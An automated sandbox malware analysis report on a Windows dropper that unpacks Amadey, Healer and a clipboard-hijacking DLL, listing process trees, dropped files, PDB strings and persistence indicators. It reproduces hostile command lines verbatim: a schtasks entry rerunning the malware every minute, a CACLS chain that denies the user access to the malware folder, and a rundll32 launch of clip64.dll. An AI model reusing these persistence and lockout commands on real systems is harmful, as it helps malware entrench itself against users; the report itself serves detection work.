                            Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 425996 bytes, 2 files, at 0x2c +A "bmKg.exe" +A "xriv.exe", ID 1578, number 1, 20 datablocks, 0x1503 compression
                            Source: bmKg.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 235074 bytes, 2 files, at 0x2c +A "aTaf.exe" +A "nika.exe", ID 1535, number 1, 12 datablocks, 0x1503 compression
                            Source: file.exe, 00000000.00000003.312037051.00000000052D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                            Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aTaf.exe.logJump to behavior
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@37/14@0/2
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_010E597D
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_022FA1A8 ChangeServiceConfigA,2_2_022FA1A8
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_010E4FE0
                            Source: file.exeReversingLabs: Detection: 69%
                            Source: file.exeVirustotal: Detection: 52%
                            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /FJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&ExitJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, MainJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /EJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /EJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_010E1F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A71F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00A71F90
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_010E597D
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_01
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeMutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_01
                            Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll0_2_010E2BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCommand line argument: Kernel32.dll1_2_00A72BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCommand line argument: 08A2_2_00413780
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: wextract.pdb source: file.exe, bmKg.exe.0.dr
                            Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.312037051.00000000052D0000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 00000008.00000000.444906113.000000000139E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 00000009.00000000.446524500.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000009.00000002.834452126.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000002.451321345.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000000.450744153.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000016.00000000.531763918.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000016.00000002.531978816.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001A.00000000.658255066.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001A.00000002.658522671.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001B.00000002.787572067.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001B.00000000.786896647.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe.0.dr, mnolyk.exe.8.dr
                            Source: Binary string: Healer.pdb source: aTaf.exe, 00000002.00000002.415511177.0000000002350000.00000004.08000000.00040000.00000000.sdmp, aTaf.exe, 00000002.00000002.415726088.0000000002601000.00000004.00000800.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415355869.0000000001FE0000.00000004.00000020.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415653987.0000000002510000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: wextract.pdbGCTL source: file.exe, bmKg.exe.0.dr
                            Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bmKg.exe, 00000001.00000003.312737185.0000000004BBA000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000007.00000000.416696337.00000000001F2000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                            Source: Binary string: _.pdb source: aTaf.exe, 00000002.00000002.415511177.0000000002350000.00000004.08000000.00040000.00000000.sdmp, aTaf.exe, 00000002.00000002.415726088.0000000002601000.00000004.00000800.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415355869.0000000001FE0000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: QC:\gabebuneyitu besefahuc_wewi.pdb source: bmKg.exe, 00000001.00000003.312737185.0000000004B88000.00000004.00000020.00020000.00000000.sdmp, aTaf.exe, 00000002.00000000.312858921.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aTaf.exe.1.dr
                            Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 00000009.00000002.834626616.0000000001485000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.834537684.000000006F46F000.00000002.00000001.01000000.0000000C.sdmp, clip64.dll.9.dr, clip64[1].dll.9.dr
                            Source: Binary string: Healer.pdbH5 source: aTaf.exe, 00000002.00000002.415511177.0000000002350000.00000004.08000000.00040000.00000000.sdmp, aTaf.exe, 00000002.00000002.415726088.0000000002601000.00000004.00000800.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415355869.0000000001FE0000.00000004.00000020.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415653987.0000000002510000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\gabebuneyitu besefahuc_wewi.pdb source: bmKg.exe, 00000001.00000003.312737185.0000000004B88000.00000004.00000020.00020000.00000000.sdmp, aTaf.exe, 00000002.00000000.312858921.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aTaf.exe.1.dr

                            Data Obfuscation

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeUnpacked PE file: 2.2.aTaf.exe.400000.0.unpack
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeUnpacked PE file: 2.2.aTaf.exe.400000.0.unpack .text:ER;.data:W;.sozibuy:R;.zeher:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E724D push ecx; ret 0_2_010E7260
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A7724D push ecx; ret 1_2_00A77260
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0051C125 push ebx; ret 2_2_0051C126
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0050E484 push ecx; ret 2_2_0050E497
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0051BE73 push cs; iretd 2_2_0051BF49
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0051BF75 push cs; iretd 2_2_0051BF49
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_022F4139 push edi; iretd 2_2_022F414E
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_022F454E push ecx; retf 2_2_022F4554
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_01387D26 push ecx; ret 8_2_01387D39
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0137F748 push E8FFFFFBh; iretd 8_2_0137F74D
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_010E2F1D
                            Source: nika.exe.1.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                            Source: aTaf.exe.1.drStatic PE information: section name: .sozibuy
                            Source: aTaf.exe.1.drStatic PE information: section name: .zeher

                            Persistence and Installation Behavior

                            barindex
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 00000009.00000002.834626616.000000000146C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.834626616.00000000013FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: mnolyk.exe PID: 3136, type: MEMORYSTR
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\clip64[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_010E1AE8
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A71AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00A71AE8

                            Boot Survival

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
